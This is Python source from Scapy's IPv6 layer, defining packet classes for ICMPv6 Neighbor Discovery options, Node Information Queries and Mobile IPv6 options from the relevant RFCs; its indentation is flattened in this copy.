class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffff),
XIntField("preferredlifetime",0xffffffff),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = raw(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)//8),
StrFixedLenField("res", b"\x00"*6, 6),
TruncPktLenField("pkt", b"", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += b'\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return b""
if l in [2, 3]:
return x[:8*(l-1)]
return x + b'\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x//8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
# Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, fld=None, length_from=None, padded=False):
self.padded = padded
StrLenField.__init__(self, name, default, fld, length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
x = plain_str(x)
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and x[0] != b'\x00':
l = ord(x[0])
cur.append(x[1:l+1])
x = x[l+1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and x[0] == b'\x00':
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and z[-1] == b'\x00':
return z
return z+b'\x00'
# Build the encode names
tmp = [[chb(len(z)) + z for z in y.split('.')] for y in x]
ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
return ret_string
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x//8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return raw(self.tgt)+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return raw(self.tgt)+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", b"\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Options requises : source lladdr et target lladdr
# Autres options valides : source address list, MTU
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
# demandee dans l'option requise target lladdr et l'utiliser au niveau
# de l'adresse destination ethernet si aucune adresse n'est precisee
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
# les options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Options requises : target lladdr, target address list
# Autres options valides : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
@conf.commands.register
def computeNIGroupAddr(name):
"""Compute the NI group Address. Can take a FQDN as input parameter"""
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overridden
# - Name in the other cases: code is set to 0, if not overridden by user
#
# Internal storage, is not only the value, but the a pair providing
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if isinstance(x, str):
if x and x[-1] == '\x00': # stupid heuristic
return x.encode("utf8")
x = [x.encode("utf8")]
elif type(x) is bytes:
if x and x[-1] == 0:
return x
res = []
for n in x:
termin = b"\x00"
if n.count(b'.') == 0: # single-component gets one more
termin += b'\x00'
n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
res.append(n)
return b"".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if x is tuple and isinstance(x[0], int):
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
x = plain_str(x)
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return b"", (1, s)
def addfield(self, pkt, s, val):
if ((isinstance(val, tuple) and val[1] is None) or
val is None):
val = (1, b"")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if not isinstance(x, tuple):
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if isinstance(x, str): # listify the string
x = [x]
if isinstance(x, list) and x and not isinstance(x[0], int): # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if isinstance(x, str):
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if isinstance(x, str):
return (0, x)
return x
return (qtype, [addttl(d) for d in x])
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = b""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0])+inet_pton(socket.AF_INET6, x_y1[1]), tmp))
elif t == 4:
return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0])+inet_pton(socket.AF_INET, x_y2[1]), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, b"")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
elif qtype == 2:
if len(s) < 4:
return s, (0, b"")
ttl = struct.unpack("!I", s[:4])[0]
return b"", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return b"", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if isinstance(x, tuple) and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
x = 2 ; y = 0# alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
